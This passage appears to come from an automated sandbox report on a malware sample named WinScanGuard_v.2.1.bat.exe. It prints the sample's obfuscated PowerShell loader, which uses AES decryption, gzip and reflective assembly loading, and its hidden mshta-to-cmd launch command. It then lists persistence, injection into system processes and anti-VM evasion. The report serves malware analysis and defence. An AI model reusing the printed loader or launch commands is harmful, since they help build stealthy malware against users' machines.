System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqW
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXd
Source: unknown Process created: C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
Source: C:\Windows\$sxr-mshta.exe Code function: 13_2_000001A00AAE870D push rcx; retf 003Fh 13_2_000001A00AAE870E
Source: C:\Windows\$sxr-mshta.exe Code function: 13_2_000001A00BDC950D push rcx; retf 003Fh 13_2_000001A00BDC950E
Source: C:\Windows\$sxr-cmd.exe Code function: 16_2_0000020D0B60870D push rcx; retf 003Fh 16_2_0000020D0B60870E
Source: C:\Windows\$sxr-cmd.exe Code function: 16_2_0000020D0B63950D push rcx; retf 003Fh 16_2_0000020D0B63950E
Source: C:\Windows\$sxr-powershell.exe Code function: 21_2_000002428789870D push rcx; retf 003Fh 21_2_000002428789870E
Source: C:\Windows\$sxr-powershell.exe Code function: 21_2_00000242878C950D push rcx; retf 003Fh 21_2_00000242878C950E
Source: C:\Windows\$sxr-powershell.exe Code function: 21_2_00007FFD9BB806C8 push edi; ret 21_2_00007FFD9BB806CA
Source: C:\Windows\System32\winlogon.exe Code function: 24_2_00000225DC62870D push rcx; retf 003Fh 24_2_00000225DC62870E
Source: C:\Windows\System32\winlogon.exe Code function: 24_2_00000225DC65950D push rcx; retf 003Fh 24_2_00000225DC65950E
Source: C:\Windows\System32\winlogon.exe Code function: 24_2_00000225DC68870D push rcx; retf 003Fh 24_2_00000225DC68870E
Source: C:\Windows\System32\winlogon.exe Code function: 24_2_00000225DC70870D push rcx; retf 003Fh 24_2_00000225DC70870E
Source: C:\Windows\System32\winlogon.exe Code function: 24_2_00000225DC76870D push rcx; retf 003Fh 24_2_00000225DC76870E
Source: C:\Windows\System32\winlogon.exe Code function: 24_2_00000225DC7C870D push rcx; retf 003Fh 24_2_00000225DC7C870E
Source: C:\Windows\System32\winlogon.exe Code function: 24_2_00000225DC82870D push rcx; retf 003Fh 24_2_00000225DC82870E
Source: C:\Windows\System32\lsass.exe Code function: 25_2_00000202C0AC870D push rcx; retf 003Fh 25_2_00000202C0AC870E
Source: C:\Windows\System32\lsass.exe Code function: 25_2_00000202C0AF950D push rcx; retf 003Fh 25_2_00000202C0AF950E
Source: C:\Windows\System32\svchost.exe Code function: 27_2_000002A6612E870D push rcx; retf 003Fh 27_2_000002A6612E870E
Source: C:\Windows\System32\svchost.exe Code function: 27_2_000002A66131950D push rcx; retf 003Fh 27_2_000002A66131950E
Source: C:\Windows\System32\svchost.exe Code function: 27_2_000002A66137950D push rcx; retf 003Fh 27_2_000002A66137950E
Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAAF1E870D push rcx; retf 003Fh 30_2_000002BAAF1E870E
Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAAF21870D push rcx; retf 003Fh 30_2_000002BAAF21870E
Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAB14C950D push rcx; retf 003Fh 30_2_000002BAB14C950E
Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAB14F870D push rcx; retf 003Fh 30_2_000002BAB14F870E
Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAB155870D push rcx; retf 003Fh 30_2_000002BAB155870E
Source: C:\Windows\System32\svchost.exe Code function: 31_2_0000026A879D870D push rcx; retf 003Fh 31_2_0000026A879D870E
Source: C:\Windows\System32\svchost.exe Code function: 31_2_0000026A87F5950D push rcx; retf 003Fh 31_2_0000026A87F5950E
Source: C:\Windows\System32\svchost.exe Code function: 36_2_000001795378870D push rcx; retf 003Fh 36_2_000001795378870E
Source: C:\Windows\System32\svchost.exe Code function: 36_2_00000179537B950D push rcx; retf 003Fh 36_2_00000179537B950E
Source: C:\Windows\System32\svchost.exe Code function: 36_2_0000017953D5950D push rcx; retf 003Fh 36_2_0000017953D5950E
Source: C:\Windows\$sxr-mshta.exe Code function: 13_2_00007FF7142F1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,13_2_00007FF7142F1008
Source: WinScanGuard_v.2.1.bat.exe.0.dr Static PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
Source: $sxr-cmd.exe.2.dr Static PE information: section name: .didat

              Persistence and Installation Behavior

Source: C:\Windows\$sxr-powershell.exe Executable created and started: C:\Windows\$sxr-powershell.exe
Source: C:\Windows\$sxr-mshta.exe Executable created and started: C:\Windows\$sxr-cmd.exe
Source: unknown Executable created and started: C:\Windows\$sxr-mshta.exe
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe File created: C:\Windows\$sxr-cmd.exe
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe File created: C:\Windows\$sxr-powershell.exe
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe File created: C:\Windows\$sxr-mshta.exe

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile deleted: c:\users\user\desktop\winscanguard_v.2.1.batJump to behavior
              Source: C:\Windows\$sxr-powershell.exeFile opened: C:\Windows\$sxr-powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-mshta.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe | File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: c:\windows\$sxr-powershell.exe | Key value queried: Powershell behavior
Source: c:\users\user\desktop\winscanguard_v.2.1.bat.exe | Key value queried: Powershell behavior
Source: c:\windows\$sxr-powershell.exe | Key value queried: Powershell behavior
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe TID: 6220 | Thread sleep count: 4099 > 30
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe TID: 6220 | Thread sleep count: 5188 > 30
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe TID: 2124 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\$sxr-powershell.exe TID: 6368 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\$sxr-powershell.exe TID: 3020 | Thread sleep count: 473 > 30
Source: C:\Windows\$sxr-powershell.exe TID: 5952 | Thread sleep count: 114 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1888 | Thread sleep count: 5670 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1888 | Thread sleep time: -5670000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1888 | Thread sleep count: 4325 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1888 | Thread sleep time: -4325000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5904 | Thread sleep count: 9971 > 30
Source: C:\Windows\System32\lsass.exe TID: 5904 | Thread sleep time: -9971000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6464 | Thread sleep count: 239 > 30
Source: C:\Windows\System32\svchost.exe TID: 6464 | Thread sleep time: -239000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 664 | Thread sleep count: 8323 > 30
Source: C:\Windows\System32\dwm.exe TID: 664 | Thread sleep time: -8323000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 664 | Thread sleep count: 1514 > 30
Source: C:\Windows\System32\dwm.exe TID: 664 | Thread sleep time: -1514000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1612 | Thread sleep count: 221 > 30
Source: C:\Windows\System32\svchost.exe TID: 1612 | Thread sleep time: -221000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1440 | Thread sleep count: 223 > 30
Source: C:\Windows\System32\svchost.exe TID: 1440 | Thread sleep time: -223000s >= -30000s
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 2088 | Thread sleep time: -173000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5232 | Thread sleep count: 217 > 30
Source: C:\Windows\System32\svchost.exe TID: 5232 | Thread sleep time: -217000s >= -30000s
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 1196 | Thread sleep count: 160 > 30
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 1196 | Thread sleep time: -160000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3968 | Thread sleep count: 246 > 30
Source: C:\Windows\System32\svchost.exe TID: 3968 | Thread sleep time: -246000s >= -30000s
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 7212 | Thread sleep count: 98 > 30
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 7212 | Thread sleep time: -98000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe | Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\$sxr-powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Window / User API: threadDelayed 4099
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Window / User API: threadDelayed 5188
Source: C:\Windows\$sxr-powershell.exe | Window / User API: threadDelayed 4621
Source: C:\Windows\$sxr-powershell.exe | Window / User API: threadDelayed 3781
Source: C:\Windows\$sxr-powershell.exe | Window / User API: threadDelayed 473
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 5670
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 4325
Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 9971
Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 8323
Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 1514
Source: C:\Windows\SysWOW64\dllhost.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_23-614
Source: C:\Windows\System32\dllhost.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_22-228
Source: C:\Windows\$sxr-mshta.exe | API coverage: 8.5 %
Source: C:\Windows\$sxr-cmd.exe | API coverage: 7.7 %
Source: C:\Windows\$sxr-powershell.exe | API coverage: 1.6 %
Source: C:\Windows\System32\lsass.exe | API coverage: 7.5 %
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | API coverage: 6.3 %
Source: C:\Windows\System32\svchost.exe | API coverage: 3.4 %
Source: C:\Windows\System32\svchost.exe | API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe | API coverage: 3.9 %
Source: C:\Windows\$sxr-mshta.exe | Memory allocated: 1A00A030000 memory reserve | memory write watch
Source: C:\Windows\$sxr-mshta.exe | Memory allocated: 1A00A250000 memory commit | memory reserve | memory write watch
Source: C:\Windows\$sxr-mshta.exe | Memory allocated: 1A00A590000 memory commit | memory reserve | memory write watch
Source: C:\Windows\$sxr-mshta.exe | Memory allocated: 1A00A5E0000 memory reserve | memory write watch
Source: C:\Windows\System32\lsass.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dwm.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\$sxr-powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\dllhost.exe | API call chain: ExitProcess graph end node graph_23-382
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData
Source: Amcache.hve.10.dr | Binary or memory string: VMware
Source: Amcache.hve.10.dr | Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: dwm.exe, 0000001E.00000002.2933213881.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Amcache.hve.10.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000019.00000002.2907841502.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046413873.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.2053136281.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2907025348.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2925839601.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000000.2070795502.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.2072742212.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2906025676.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000001B.00000002.2907259329.000002A66062A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
Source: Amcache.hve.10.dr | Binary or memory string: VMware20,1
